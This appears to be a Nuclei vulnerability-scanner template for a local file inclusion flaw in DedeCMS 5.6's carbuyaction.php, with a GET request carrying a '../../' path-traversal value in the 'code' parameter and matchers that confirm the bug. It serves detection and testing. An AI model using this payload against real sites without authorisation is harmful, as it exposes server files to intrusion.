id: dedecms-carbuyaction-fileinclude info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu severity: high description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: https://www.cnblogs.com/milantgh/p/3615986.html tags: dedecms requests: - method: GET path: - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../' headers: Cookie: code=cod redirects: true matchers-condition: and matchers: - type: word words: - "Cod::respond()" part: body condition: and - type: status status: - 200